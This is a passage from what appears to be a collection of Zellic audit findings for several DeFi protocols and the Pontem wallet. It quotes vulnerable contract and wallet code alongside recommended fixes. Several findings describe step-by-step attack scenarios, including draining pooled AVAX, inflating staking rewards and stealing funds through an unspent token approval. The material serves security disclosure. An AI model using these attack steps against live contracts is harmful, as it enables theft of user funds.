    // Valid Amount?
    if (amount == 0) {
        revert InvalidAmount();
    }
    // Emit transfer event
    emit AVAXTransfer(fromContractName, toContractName, amount);
    // Make sure the contracts are valid, will revert if not
    getContractAddress(fromContractName);
    getContractAddress(toContractName);
    // Verify there are enough funds
    if (avaxBalances[fromContractName] < amount) {
        revert InsufficientContractBalance();
    }
    // Update balances
    avaxBalances[fromContractName] = avaxBalances[fromContractName] - amount;
    avaxBalances[toContractName] = avaxBalances[toContractName] + amount;
}

The current checks ensure that the msg.sender is a registered network contract; however, the function never verifies that the caller is the contract named by fromContractName. Because fromContractName can be chosen arbitrarily, a malicious registered network contract can drain the AVAX balances of all the other registered contracts. We recommend removing the fromContractName parameter altogether and ensuring that the funds can only be transferred by the caller of the function, msg.sender:

function transferAVAX(
    // @audit-info doesn't exist in rocketvault
    string memory fromContractName,
    string memory toContractName,
    uint256 amount
) external onlyRegisteredNetworkContract {
    // Valid Amount?
    if (amount == 0) {
        revert InvalidAmount();
    }
    // Emit transfer event
    emit AVAXTransfer(msg.sender, toContractName, amount);
    // Make sure the contracts are valid, will revert if not
    getContractAddress(msg.sender);
    getContractAddress(toContractName);
    // Verify there are enough funds
    if (avaxBalances[msg.sender] < amount) {
        revert InsufficientContractBalance();
    }
    // Update balances
    avaxBalances[msg.sender] = avaxBalances[msg.sender] - amount;
    avaxBalances[toContractName] = avaxBalances[toContractName] + amount;
}

The issue has been fixed by Multisig Labs in commit 84211f.
", "html_url": "https://github.com/Zellic/publications/blob/master/GoGoPool - Zellic Audit Report.pdf" }, { "title": "3.2 Ocyticus does not include the Staking pause", "labels": [ "Zellic" ], "body": "Target: Ocyticus, Staking Category: Business Logic Likelihood: Medium Severity: High Impact: High

The pauseEverything and resumeEverything functions are used to restrict access to important functions.
function pauseEverything() external onlyDefender {
    ProtocolDAO dao = ProtocolDAO(getContractAddress("ProtocolDAO"));
    dao.pauseContract("TokenggAVAX");
    dao.pauseContract("MinipoolManager");
    disableAllMultisigs();
}

/// @notice Reestablish all contract's abilities
/// @dev Multisigs will need to be enabled seperately, we dont know which ones to enable
function resumeEverything() external onlyDefender {
    ProtocolDAO dao = ProtocolDAO(getContractAddress("ProtocolDAO"));
    dao.resumeContract("TokenggAVAX");
    dao.resumeContract("MinipoolManager");
}

Apart from TokenggAVAX and MinipoolManager, the Staking contract also makes use of the whenNotPaused modifier for its important functions. The paused state will, however, not trigger at the same time as the pauseEverything call, since the Staking contract is omitted here, both for pausing and resuming. Should an emergency arise, pauseEverything will be called. In this case, Staking will be omitted, which could put user funds in danger. We recommend ensuring that the Staking contract is also paused in the pauseEverything function as well as unpaused in the resumeEverything function:

function pauseEverything() external onlyDefender {
    ProtocolDAO dao = ProtocolDAO(getContractAddress("ProtocolDAO"));
    dao.pauseContract("TokenggAVAX");
    dao.pauseContract("MinipoolManager");
    dao.pauseContract("Staking");
    disableAllMultisigs();
}

/// @notice Reestablish all contract's abilities
/// @dev Multisigs will need to be enabled seperately, we dont know which ones to enable
function resumeEverything() external onlyDefender {
    ProtocolDAO dao = ProtocolDAO(getContractAddress("ProtocolDAO"));
    dao.resumeContract("TokenggAVAX");
    dao.resumeContract("MinipoolManager");
    dao.resumeContract("Staking");
}

The issue has been fixed by Multisig Labs in commit dbc499.
", "html_url": "https://github.com/Zellic/publications/blob/master/GoGoPool - Zellic Audit Report.pdf" }, { "title": "3.3 The reward amount manipulation", "labels": [ "Zellic" ], "body": "Target: ClaimNodeOp.sol Category: Business Logic Likelihood: Medium Severity: High Impact: High

A staker is eligible for the upcoming rewards cycle if they have staked their tokens for a long enough period of time. The reward amount is distributed in proportion to the amount of funds staked by the user out of the total amount of funds staked by all users who claim the reward. But since rewardsStartTime is set only at the creation of the first pool, and all staked funds are taken into account during the reward calculations, even if they have not yet been locked and can still be withdrawn, the attack described below is possible.

The attack scenario:
1. An attacker stakes GGP tokens and creates a minipool with a minimum avaxAssignmentRequest value.
2. The multisig initiates the staking process by calling the claimAndInitiateStaking function.
3. Wait for the time of distribution of rewards.
4. Before the reward distribution process begins, the attacker creates a new minipool with the maximum avaxAssignmentRequest value.
5. Initiate the reward distribution process.
6. Immediately after that, the attacker cancels the minipool with the cancelMinipool function before the claimAndInitiateStaking function call and recovers most of their staked funds.

The attacker can increase their reward portion without actually staking their own funds.
Take into account only the funds actually staked, or check that all minipools have been launched. The issue has been fixed by Multisig Labs in commits c90b2f and f49931.
", "html_url": "https://github.com/Zellic/publications/blob/master/GoGoPool - Zellic Audit Report.pdf" }, { "title": "3.4 Network registered contracts have absolute storage control", "labels": [ "Zellic" ], "body": "Target: Project-wide Category: Business Logic Likelihood: Low Severity: High Impact: High

The network-registered contracts have absolute control over the storage that all the contracts are associated with through the Storage contract. This is inherent to the overall design of the protocol, which makes use of a single Storage contract, eliminating the need for local storage. For that reason, any registered contract can update any storage slot, even if it \u201cbelongs\u201d to another contract.

modifier onlyRegisteredNetworkContract() {
    if (booleanStorage[keccak256(abi.encodePacked("contract.exists", msg.sender))] == false && msg.sender != guardian) {
        revert InvalidOrOutdatedContract();
    }
    _;
}

// ...

function setAddress(bytes32 key, address value) external onlyRegisteredNetworkContract {
    addressStorage[key] = value;
}

function setBool(bytes32 key, bool value) external onlyRegisteredNetworkContract {
    booleanStorage[key] = value;
}

function setBytes(bytes32 key, bytes calldata value) external onlyRegisteredNetworkContract {
    bytesStorage[key] = value;
}

As an example, the setter functions inside the Staking contract have different restrictions for the caller (e.g., the setLastRewardsCycleCompleted function can be called only by the ClaimNodeOp contract), but the setUint function in Storage may actually be called by any RegisteredNetworkContract. We believe that in a highly unlikely case, a malicious network-registered contract could potentially alter the entire protocol Storage at will. Additionally, if it were possible to setBool for an arbitrary address, then this scenario would be further exploitable by a malicious developer contract. We recommend paying extra attention to the registration of network contracts, as well as closely monitoring where and when the setBool function is used, since the network registration is based on a boolean value attributed to the contract address. The issue has been acknowledged by Multisig Labs. Their official reply is reproduced below:

While it is true that any registered contract can write to Storage, we view all of the separate contracts comprising the Protocol as a single system. A single entity (either the Guardian Multisig or in future the ProtocolDAO) will be in control of all of the contracts. In this model, if an attacker can register a single malicious contract, then they are also in full control of the Protocol itself. Because all of the contracts are treated as a single entity, there is no additional security benefit to be gained by providing access controls between the various contract\u2019s storage slots. As a mitigation, the Protocol will operate several distributed Watchers that will continually scan the central Storage contract, and alert on any changes.
", "html_url": "https://github.com/Zellic/publications/blob/master/GoGoPool - Zellic Audit Report.pdf" }, { "title": "3.5 Oracle may reflect an outdated price", "labels": [ "Zellic" ], "body": "Target: Oracle Category: Business Logic Likelihood: Medium Severity: Medium Impact: Medium

Some functions at the protocol level make use of getGGPPriceInAVAX. This getter retrieves the price, which is set by the Rialto multisig.

/// @notice Get the price of GGP denominated in AVAX
/// @return price of ggp in AVAX
/// @return timestamp representing when it was updated
function getGGPPriceInAVAX() external view returns (uint256 price, uint256 timestamp) {
    price = getUint(keccak256("Oracle.GGPPriceInAVAX"));
    if (price == 0) {
        revert InvalidGGPPrice();
    }
    timestamp = getUint(keccak256("Oracle.GGPTimestamp"));
}

Due to the nature of on-chain price feeds, oracles need to have an as-often-as-possible policy in regards to how often the price gets updated. For that reason, the reliance on Rialto may be problematic should it fail to update the price often enough. Should the price be erroneous, possible front-runs may happen at the protocol level, potentially leading to a loss of funds on the user-end side. We recommend implementing a staleness check, which essentially does not allow a price to be used should it have been updated more than x blocks ago. The finding has been acknowledged by the Multisig Labs team. Their official reply is reproduced below:

The price of GGP is used in the Protocol to determine collateralization ratios for minipools as well as slashing amounts. If the price of GGP is unknown or outdated, the protocol cannot operate. So our remediation for this will be to have a distributed set of Watchers that will Pause the Protocol if the GGP Price becomes outdated. At some point in the future the Protocol will use on-chain TWAP price oracles to set the GGP price.
", "html_url": "https://github.com/Zellic/publications/blob/master/GoGoPool - Zellic Audit Report.pdf" }, { "title": "3.6 Fields are not reset exactly after their usage", "labels": [ "Zellic" ], "body": "Target: MinipoolManager Category: Business Logic Likelihood: Low Severity: Low Impact: Low

Due to the nature of the protocol, some fields are queried and used in one intermediary state of the application and then reset in the last state of the application.
As an example, see the avaxNodeOpRewardAmt value, which is queried and used in withdrawMinipoolFunds (which can only be called in the WITHDRAWABLE stage)

function withdrawMinipoolFunds(address nodeID) external nonReentrant {
    int256 minipoolIndex = requireValidMinipool(nodeID);
    address owner = onlyOwner(minipoolIndex);
    requireValidStateTransition(minipoolIndex, MinipoolStatus.Finished);
    setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".status")), uint256(MinipoolStatus.Finished));
    uint256 avaxNodeOpAmt = getUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".avaxNodeOpAmt")));
    uint256 avaxNodeOpRewardAmt = getUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".avaxNodeOpRewardAmt")));
    uint256 totalAvaxAmt = avaxNodeOpAmt + avaxNodeOpRewardAmt;
    Staking staking = Staking(getContractAddress("Staking"));
    staking.decreaseAVAXStake(owner, avaxNodeOpAmt);
    Vault vault = Vault(getContractAddress("Vault"));
    vault.withdrawAVAX(totalAvaxAmt);
    owner.safeTransferETH(totalAvaxAmt);
}

and then either reset in the recordStakingEnd function, to the new round\u2019s avaxNodeOpRewardAmt, or set to 0 in recordStakingError. The protocol\u2019s structure assumes that the way in which the states are transitioned through is consistent. Should major changes occur in the future of the protocol, we suspect that some states that are presumably reset in an eventual state of the protocol may be omitted. This could in turn lead to unexpected consequences for the management of the minipool. We highly recommend that once important storage states are used, they also be reset. In this way, future versions of the protocol will have a solid way of transitioning without requiring additional synchronization of storage state. The issue has been acknowledged by Multisig Labs. Their official reply is reproduced below:

The Protocol maintains some fields in Storage so that data such as avaxNodeOpRewardAmt can be displayed to the end user. The fields will be reset if the user relaunches a minipool with the same nodeID again in the future. This is by design.
", "html_url": "https://github.com/Zellic/publications/blob/master/GoGoPool - Zellic Audit Report.pdf" }, { "title": "3.1 Protocol owner can drain pools", "labels": [ "Zellic" ], "body": "Target: DefinitiveRewardToken, DefinitiveStakingManager Category: Business Logic Likelihood: Low Severity: Critical Impact: High

Each staking manager has an associated token for accounting purposes. When a user accrues rewards, the corresponding tokens are minted. When a user withdraws tokens, the contract uses the sum of their deposits and their reward token balance. From the withdraw function,

// Withdraw from definitive vault and include reward token balances
uint256 underlyingAmount = withdrawFromDefinitive(
    _index,
    _lpTokenAmount + rewardTokenBalance
);
emit Withdraw(msg.sender, underlyingAmount);
// Transfer to user
IERC20 underlying = IERC20(underlyingTokenAddresses[_index]);
underlying.approve(msg.sender, underlyingAmount);
underlying.transfer(msg.sender, underlyingAmount);

The reward token is deployed separately by the owner, who uses the admin role to grant the corresponding staking manager the ability to mint and burn tokens. This means that the owner retains the ability to arbitrarily mint and burn tokens. By granting the MINTER_ROLE to an account they control, the owner can
1. decrease the shares of other users and
2. increase their own shares.

At any time, the owner can mint a large amount of tokens for themselves and withdraw the entire lpTokensStaked. As a consequence, in the event of a key compromise, all users would be exposed to potential loss of funds. Additionally, this requires unnecessary trust in the owner, which might discourage use of the protocol. We recommend deploying the token contract from the staking manager constructor and removing the owner\u2019s responsibility to grant roles. Alternatively, the ownership of the contract could be transferred to the staking manager. In commit 5a9a0e3f, Rainmaker fixed this issue by deploying the token contract directly from the staking manager constructor.
", "html_url": "https://github.com/Zellic/publications/blob/master/Rainmaker - Zellic Audit Report.pdf" }, { "title": "3.2 Extraneous approval during withdrawal", "labels": [ "Zellic" ], "body": "Target: DefinitiveStakingManager Category: Coding Mistakes Likelihood: Medium Severity: Critical Impact: High

At the end of the withdraw function, the tokens are transferred to the user:

// Transfer to user
IERC20 underlying = IERC20(underlyingTokenAddresses[_index]);
underlying.approve(msg.sender, underlyingAmount);
underlying.transfer(msg.sender, underlyingAmount);

However, because the transfer is done with transfer and not transferFrom or safeTransferFrom, the approval to the sender is not spent. Even after the payment, the user can still withdraw underlyingAmount of the token by calling transferFrom themselves. Definitive has the ability to withdraw tokens into the staking manager; the withdrawTo function is guarded with onlyWhitelisted. Thus, although no explicit functionality of the staking manager will leave the contract holding any funds, Definitive is allowed to perform such withdrawals and cause funds to be left in the staking manager contract. Further, future functionality may include the staking manager taking custody of tokens (such as fees) as well. In these cases, the extra approval will allow any user to steal rewards or future fees held by the staking manager. This could also be performed maliciously by Definitive. For instance, those with the ROLE_DEFINITIVE on the underlying strategy might be able to drain the contract by

1. depositing and withdrawing funds to increase unspent approval on the token,
2. calling withdrawTo on the underlying vault to withdraw funds into the staking manager, and
3. calling transferFrom on the underlying token into their own account.

Remove the unnecessary call to underlying.approve. This issue has been acknowledged by Rainmaker, and a fix was implemented in commit 46249703.
", "html_url": "https://github.com/Zellic/publications/blob/master/Rainmaker - Zellic Audit Report.pdf" }, { "title": "3.3 The underlying vault admin can drain pools", "labels": [ "Zellic" ], "body": "Target: DefinitiveStakingManager Category: Coding Mistakes Likelihood: Low Severity: Critical Impact: High

In underlying Definitive pools, the deployer can configure permissions during deployment. Importantly, a specific account is granted the DEFAULT_ADMIN_ROLE.
In CoreAccessControl,

constructor(CoreAccessControlConfig memory cfg) {
    // admin
    _setupRole(DEFAULT_ADMIN_ROLE, cfg.admin);
    // definitive admin
    _setupRole(ROLE_DEFINITIVE_ADMIN, cfg.definitiveAdmin);
    _setRoleAdmin(ROLE_DEFINITIVE_ADMIN, ROLE_DEFINITIVE_ADMIN);
    // definitive
    for (uint256 i = 0; i < cfg.definitive.length; i++) {
        _setupRole(ROLE_DEFINITIVE, cfg.definitive[i]);
    }
    _setRoleAdmin(ROLE_DEFINITIVE, ROLE_DEFINITIVE_ADMIN);
    // clients - implicit role admin is DEFAULT_ADMIN_ROLE
    for (uint256 i = 0; i < cfg.client.length; i++) {
        _setupRole(ROLE_CLIENT, cfg.client[i]);
    }
}

In OpenZeppelin\u2019s AccessControl, the user with DEFAULT_ADMIN_ROLE has the ability to manage other roles. This means that after deployment, the deployer is able to grant ROLE_CLIENT to other accounts. This allows them to steal funds by

1. granting that role to an account they control and
2. using that account to freely withdraw from the vault.

This would expose all users to potential loss of funds if the admin were ever compromised. It also requires unnecessary trust from users, which may discourage use of the protocol. We recommend that Rainmaker set a smart contract or the vault manager itself as the sole owner of the vault. This may look like a system for transferring ownership during deployment. Rainmaker added documentation in commit ac95d65e, indicating that this risk is mitigated by granting underlying pool ownership to the Rainmaker multisig.
", "html_url": "https://github.com/Zellic/publications/blob/master/Rainmaker - Zellic Audit Report.pdf" }, { "title": "3.4 Missing slippage limits allow front-running", "labels": [ "Zellic" ], "body": "Target: DefinitiveStakingManager Category: Business Logic Likelihood: Medium Severity: Medium Impact: Medium

During deposits and withdrawals, the staking manager interacts with the underlying vault for entry and exit. Those functions each have the parameter minAmount, which sets slippage limits for the staker actions. However, the minAmount is set to zero in all cases:

/**
 * @dev Withdraw tokens from Definitive vault end-to-end (exit + withdraw)
 */
function withdrawFromDefinitive(
    uint8 _index,
    uint256 lpTokens
) private returns (uint256) {
    IERC20 underlying = IERC20(underlyingTokenAddresses[_index]);
    // 1. Exit from the strategy via LP Tokens
    uint256 underlyingAmount = definitiveVault.exitOne(lpTokens, 0, _index);
    // 2. Withdraw from the vault
    definitiveVault.withdraw(underlyingAmount, address(underlying));
    return underlyingAmount;
}

These slippage limits are essential for mitigating front-running. Consider the _processExitPoolTransfers function in Balancer\u2019s PoolBalances contract:

/**
 * @dev Transfers `amountsOut` to `recipient`, checking that they are within their accepted limits, and pays
 * accumulated protocol swap fees from the Pool.
 *
 * Returns the Pool's final balances, which are the current `balances` minus `amountsOut` and fees paid
 * (`dueProtocolFeeAmounts`).
 */
function _processExitPoolTransfers(
    address payable recipient,
    PoolBalanceChange memory change,
    bytes32[] memory balances,
    uint256[] memory amountsOut,
    uint256[] memory dueProtocolFeeAmounts
) private returns (bytes32[] memory finalBalances) {
    finalBalances = new bytes32[](balances.length);
    for (uint256 i = 0; i < change.assets.length; ++i) {
        uint256 amountOut = amountsOut[i];
        _require(amountOut >= change.limits[i], Errors.EXIT_BELOW_MIN);
        // ...
    }
    // ...
}

If the minAmount (which becomes an element of change.limits) is set to zero, the slippage check does nothing. This leaves users vulnerable to front-running. We recommend that the protocol provide users a way to specify minAmount. This issue has been acknowledged by Rainmaker, and a fix was implemented in commit 2c613c09.
", "html_url": "https://github.com/Zellic/publications/blob/master/Rainmaker - Zellic Audit Report.pdf" }, { "title": "3.5 Unenforced assumptions about Definitive behavior", "labels": [ "Zellic" ], "body": "Target: DefinitiveRewardToken Category: Business Logic Likelihood: Medium Severity: Medium Impact: Medium

The staking manager makes some assumptions about underlying vault behavior that may not be true. For instance, it treats the LP token balance as increasing (except during withdrawals). However, Definitive is permitted to perform exits and decrease that balance. Violation of these assumptions might cause user funds to become locked. In staking manager withdrawal functions, withdrawals are always accompanied by exits:

/**
 * @dev Withdraw tokens from Definitive vault end-to-end (exit + withdraw)
 */
function withdrawFromDefinitive(
    uint8 _index,
    uint256 lpTokens
) private returns (uint256) {
    IERC20 underlying = IERC20(underlyingTokenAddresses[_index]);
    // 1. Exit from the strategy via LP Tokens
    uint256 underlyingAmount = definitiveVault.exitOne(lpTokens, 0, _index);
    // 2. Withdraw from the vault
    definitiveVault.withdraw(underlyingAmount, address(underlying));
    return underlyingAmount;
}

Since exiting and withdrawing are done together, there is no way to withdraw funds that are unstaked. Those with ROLE_DEFINITIVE have permissions to unstake funds into the underlying vault. Additionally, as mentioned in 3.2, they are able to withdraw vault funds into the staking manager too. These situations will create unstaked funds that cannot be withdrawn. As a mitigation, Rainmaker could provide users the ability to redeposit and reenter funds if they get stuck in either the underlying vault or the staking manager. Additionally, the vault is not immune to losses: it is possible for unfavorable conditions to cause a net decrease in LP token balance. This may result in shares that cannot be withdrawn. Rainmaker should document such risks. Rainmaker added functionality for restaking such funds in commit 25188ee8.
", "html_url": "https://github.com/Zellic/publications/blob/master/Rainmaker - Zellic Audit Report.pdf" }, { "title": "3.6 Excessive owner responsibility creates deployment risks", "labels": [ "Zellic" ], "body": "Target: DefinitiveRewardToken, DefinitiveStakingManager Category: Code Maturity Likelihood: Low Severity: Medium Impact: Medium

Each staking manager, from construction, holds an array of underlying token addresses:

// Constructor
constructor(
    address[] memory _underlyingAddresses,
    address _rewardTokenAddress,
    address _definitiveVaultAddress
) {
    underlyingTokenAddresses = _underlyingAddresses;
    rewardToken = DefinitiveRewardToken(_rewardTokenAddress);
    definitiveVault = IDefinitiveVault(_definitiveVaultAddress);
}

The precise order and contents of this array are extremely important because in depositIntoDefinitive, the amounts array must correspond exactly to both underlyingTokenAddresses and the token addresses in the vault.

/**
 * @dev Deposit tokens into Definitive vault end-to-end (deposit + enter)
 * @return Staked amount (lpTokens)
 */
function depositIntoDefinitive(
    uint256 _underlyingAmount,
    uint8 _index
) private returns (uint256) {
    IERC20 underlying = IERC20(underlyingTokenAddresses[_index]);
    uint256[] memory amounts = new uint256[](underlyingTokenAddresses.length);
    amounts[_index] = _underlyingAmount;
    // 1. Approve vault to spend underlying
    underlying.approve(address(definitiveVault), _underlyingAmount);
    // 2. Deposit into the vault
    definitiveVault.deposit(amounts, underlyingTokenAddresses);
    // 3. Enter into the strategy using 0 as minAmountsOut to get standard slippage
    return definitiveVault.enter(amounts, 0);
}

This means that during deployment, the owner is responsible for ensuring that _underlyingAddresses matches the vault\u2019s LP_UNDERLYING_TOKENS. Additionally, the owner needs to grant the staking manager the MINTER_ROLE in its corresponding reward token. If the underlyingTokenAddresses array does not match LP_UNDERLYING_TOKENS, the protocol may experience incorrect accounting or broken functionality. If the staking manager is not granted the required role, then deposits and withdrawals would eventually fail. Worse, if MINTER_ROLE on one token is mistakenly granted to multiple different staking managers, they could experience severe accounting issues and users may lose funds. We recommend that the protocol determine the underlying token addresses from the given vault as a single source of truth. The second issue is mitigated by the recommendation in 3.1. Rainmaker fixed these risks in 32bfa1fa and the remediations for 3.1.
", "html_url": "https://github.com/Zellic/publications/blob/master/Rainmaker - Zellic Audit Report.pdf" }, { "title": "3.7 Staking manager may become locked", "labels": [ "Zellic" ], "body": "Target: DefinitiveStakingManager Category: Business Logic Likelihood: Low Severity: Medium Impact: Medium

The underlying vaults contain functionality that allows Definitive to pause contracts and the vault admin to unpause them. In BaseAccessControl,

/**
 * @dev Inherited from CoreStopGuardian
 */
function enableStopGuardian() public override onlyAdmins {
    return _enableStopGuardian();
}

/**
 * @dev Inherited from CoreStopGuardian
 */
function disableStopGuardian() public override onlyClientAdmin {
    return _disableStopGuardian();
}

The STOP_GUARDIAN_ENABLED flag is checked on critical strategy functions.
This means that the admin of the underlying strategy has the responsibility to prevent funds from being locked. In some unfavorable events (such as private key loss or compromise), staking manager mechanics may break. In addition to the recommendations in 3.3, we recommend providing users some control over this \u201cunpause\u201d functionality, for example, by creating a smart contract, or modifying the staking manager, to act as the admin and allow users to unpause the contract. In case some pauses are necessary, this might include reasonable timelocks. In commit 6abfbd3d, Rainmaker documented that the admin role will be held by a multisig to mitigate centralization risk.
", "html_url": "https://github.com/Zellic/publications/blob/master/Rainmaker - Zellic Audit Report.pdf" }, { "title": "3.8 Potential centralization risk from fee configuration", "labels": [ "Zellic" ], "body": "Target: DefinitiveStakingManager Category: Business Logic Likelihood: N/A Severity: Informational Impact: N/A

Though the value is not yet used, the staking manager allows the owner to set feePct:

/**
 * @dev Set fees
 */
function setFees(uint256 _feePct) external onlyOwner {
    feePct = _feePct;
}

If future additions to the protocol do use feePct, the owner would have the ability to make fees arbitrarily high, even above 100%. In general, this requires unnecessary trust from users, which might discourage use of the protocol. In the case of key compromise, this would grant an attacker the ability to steal additional user funds. We recommend adding a reasonable upper limit (that is at least below 100%) on feePct if it is ever used. Alternatively, Rainmaker could instead implement a timelock for such configuration upgrades to allow users time to react to adverse changes. Rainmaker removed this functionality in 1d606d40.
", "html_url": "https://github.com/Zellic/publications/blob/master/Rainmaker - Zellic Audit Report.pdf" }, { "title": "3.1 Malformed responses to the coinInfo API can soft lock the wallet", "labels": [ "Zellic" ], "body": "Target: src/data/queries/coinInfo.ts Category: Coding Mistakes Likelihood: Low Severity: Medium Impact: Medium

A request is automatically sent to the endpoint /v1/accounts/0x1/resource/0x1::coin::CoinInfo%3C0x1::aptos_coin::AptosCoin%3E during startup. The handler fails to check for errors, leading to a permanent soft lock when malformed data is returned. There are multiple scenarios where this could happen:

- The RPC endpoint encounters an error
- The RPC endpoint is malicious

The requests are repeated, so the extension stays bricked as long as the returned data is malformed.

async () => {
    return aptos.getAccountResource(extractAddressFromType(token as string),
        composeType(network.structs.CoinInfo, [token as string]))
        .then((value: AptosResource) => {
            const type = token as string;
            const decimals = +value.data.decimals;
            const name = value.data.name;
            const symbol = value.data.symbol;
            const alias = network.tokenAlias[token as string] ?? value.data.symbol;
            addTokenInfo({ name, symbol, decimals });
            return { type, decimals, name, symbol, alias };
        })
},
{
    ...RefetchOptions.INFINITY,
    enabled: !!token
}

It leads to a permanent soft lock of the whole extension. It can be fixed by directly visiting chrome-extension://<extension-id>/index.html#/settings/ and switching the network or reinstalling the extension. We recommend additional error handling when handling RPC responses.
A fix was introduced in commit 9b4ad36e by incorporating error handling into the function, effectively preventing the wallet extension from experiencing a persistent, endless loop in the event of receiving malformed data.
", "html_url": "https://github.com/Zellic/publications/blob/master/Pontem wallet - Zellic Audit Report.pdf" }, { "title": "3.2 Low password complexity threshold", "labels": [ "Zellic" ], "body": "Target: src/extension/modules/SignUp/SetPasswordForm/index.tsx Category: Coding Mistakes Likelihood: Medium Severity: Low Impact: High

The only requirement for the keyring password is that it needs to be at least six characters long.

const validate = (values: SubmitPasswordFormValues) => {
    const errors: SubmitPasswordFormErrors = {};

    if (!values.password) {
        errors.password = "Password required";
    } else if (values.password.length < MIN_PASSWORD_LENGTH) {
        errors.password = `Password length should contain minimum ${MIN_PASSWORD_LENGTH} characters`;
    }

    if (!values.confirm) {
        errors.confirm = "Password confirmation required";
    } else if (values.confirm.length < MIN_PASSWORD_LENGTH) {
        errors.confirm = `Password confirmation length should contain minimum ${MIN_PASSWORD_LENGTH} characters`;
    } else if (values.confirm !== values.password) {
        errors.confirm = "Password confirmation not similar";
    }

    if (!values.agreed) {
        errors.agreed = "You need to agree with terms and conditions";
    }

    return errors;
};

A six-character password can be bruteforced in a matter of seconds, leading to a compromise of the wallet. We recommend Pontem Technology Ltd. increase the length requirements along with mandating special characters and lowercase and uppercase letters. A fix was introduced in commit e6ad1094 by adding multiple requirements on password entry, such as minimum password length and special characters.
", "html_url": "https://github.com/Zellic/publications/blob/master/Pontem wallet - Zellic Audit Report.pdf" }, { "title": "3.3 Cleartext password in the browser\u2019s session storage", "labels": [ "Zellic" ], "body": "Target: src/auth/hooks/useKeyring.ts Category: Coding Mistakes Likelihood: Low Severity: Low Impact: High

After a user creates or unlocks their wallet, their password is stored in plaintext in the session storage. This is a critical piece of information and should never be available in plaintext form.

const createWallet = async (password: string) => {
    const address = await controller.createNewKeychain(password);
    if (IS_EXTENSION_RUNTIME) {
        await extension.storage.session.set({ storedPassword: password });
    }
    return address;
};

const unlock = async (password: string) => {
    const keyrings = await controller.unlock(password);
    if (IS_EXTENSION_RUNTIME) {
        await extension.storage.session.set({ storedPassword: password });
    }
    return keyrings;
};

An attacker with physical access to the machine or a cross-domain exploit can leak the plaintext password and mnemonic phrase. Handling of the plaintext password should be kept to a minimum, and the password should be immediately deleted or encrypted after use.

Figure 3.1: Example of cleartext password in session storage.

A fix was introduced in commit 0b6c08fb by encrypting the password before setting it in the local storage. A refactor of the flow is planned, which will remove the password from storage entirely.
It\u2019s worth noting that the password is not stored permanently and is automatically deleted after five minutes of inactivity.
", "html_url": "https://github.com/Zellic/publications/blob/master/Pontem wallet - Zellic Audit Report.pdf" }, { "title": "5.2 Automated Static Analysis", "labels": [ "Zellic" ], "body": "5.2 Automated Static Analysis

For the sake of comprehensiveness, we employed industry-standard static analysis tools, like Slither. Fortunately, our automated analyses did not uncover any notable issues. We would also like to note that Nexus Labs implemented a Slither test in package.json.
", "html_url": "https://github.com/Zellic/publications/blob/master/Maverick Protocol - Zellic Security Assessment Report.pdf" }, { "title": "5.3 Symbolic Execution and SMT Checking", "labels": [ "Zellic" ], "body": "5.3 Symbolic Execution and SMT Checking

We attempted to run the Mythril contract analyzer on the contracts. However, the contracts are very complex, and the analyzer never completed due to the classic state explosion problem faced by symbolic execution techniques. There is a large number of operations and many loops, resulting in an exponentially large number of states to explore. In the industry, this is an active research question currently undergoing extensive study. Running the estimator and pool through the Solidity compiler\u2019s SMTChecker to formally verify the correctness of their relationship was also not feasible due to similar issues. As of the time of writing, the SMTChecker is not able to unroll/inline loops in the contracts, rendering it practically unusable for this engagement.
However, as we discuss in the next section, we did apply fuzzing tests to strengthen the contracts\u2019 level of assurance.", "html_url": "https://github.com/Zellic/publications/blob/master/Maverick Protocol - Zellic Security Assessment Report.pdf" }, { "title": "3.1 Centralization risk on execute function", "labels": [ "Zellic" ], "body": " Target: VerifierNetwork Category: Business Logic Likelihood: Low Severity: Medium Impact: Low The execute function restricts the callers to only the admin role: function execute(ExecuteParam[] calldata _params) external onlyRole(ADMIN_ROLE) { for (uint i = 0; i < _params.length; ++i) { // ... } } } However, this restriction is unnecessary because the function requires a quorum of valid signatures. If a quorum is reached, there should be no need for the quorum-ed signatures to be sent by a trusted party. This can instead be made trustless. If an admin is unable to call execute, this will halt all the operations of the ULN. It would not be able to deliver any messages to the endpoint, even if all of the signers were online. The function should be able to be called permissionlessly to ensure the signatures may always be submitted. LayerZero Labs, after discussing with Zellic, has decided that this issue does not warrant a fix at the current time. Zellic LayerZero Labs", "html_url": "https://github.com/Zellic/publications/blob/master/LayerZero Endpoint V2 (VerifierNetwork) - Zellic Audit Report.pdf" }, { "title": "3.2 Potential replay across chains", "labels": [ "Zellic" ], "body": " Target: VerifierNetwork Category: Business Logic Likelihood: Low Severity: Low Impact: Low As LayerZero is a cross-chain application, VerifierNetwork might be deployed across multiple chains. There exists a possibility of message replay if signers are shared between multiple instances of VerifierNetwork. This is because there is no unique identifier pinning the message to the VerifierNetwork instance it can be executed at. A message can be replayed between instances of VerifierNetwork if the signers/quorum is shared. As the signed message includes the target address, calls to onlySelf(orAdmin) functions cannot be replayed. Furthermore, calls to ULN functions such as verify would not be useful to an attacker as well. Add an identifier to VerifierNetwork that is checked as part of the signature. LayerZero Labs acknowledged the issue and has fixed it in commit 175c08bd. Zellic LayerZero Labs 4 Threat Model This assessment was conducted as part of the larger assessment for Endpoint V2. Please refer to the Endpoint V2 report for a detailed threat model. Zellic LayerZero Labs 5 Assessment Results At the time of our assessment, the reviewed code was not deployed to the Ethereum Mainnet. During our assessment on the scoped Endpoint V2 (VerifierNetwork) contracts, we discovered two findings, both of which were low impact.
LayerZero Labs acknowledged all findings and implemented fixes.", "html_url": "https://github.com/Zellic/publications/blob/master/LayerZero Endpoint V2 (VerifierNetwork) - Zellic Audit Report.pdf" }, { "title": "3.1 The _getAccount function may return inaccurate information", "labels": [ "Zellic" ], "body": " Target: LockRewards Category: Coding Mistakes Likelihood: Medium Severity: Low Impact: Informational The function returns the following information: \u2013 balance, the amount of tokens deposited by the user \u2013 lockEpochs, the number of epochs for which the tokens are locked \u2013 lastEpochPaid, the last epoch for which the user has received rewards \u2013 rewards, an array of the rewards for each token The function retrieves the first three values from the accounts mapping, while the last value is calculated in a for loop. The loop iterates over the rewardTokens array, which contains the current list of reward tokens. However, since the accounts[owner].rewards mapping contains rewards for all tokens that the user has ever accrued and not claimed, if the user has accrued rewards for a token that is not in the current rewardTokens list, the function will not include it, resulting in an incomplete rewards list. function _getAccount(address owner) internal view returns (uint256 balance, uint256 lockEpochs, uint256 lastEpochPaid, uint256[] memory rewards) { rewards = new uint256[](rewardTokens.length); for (uint256 i = 0; i < 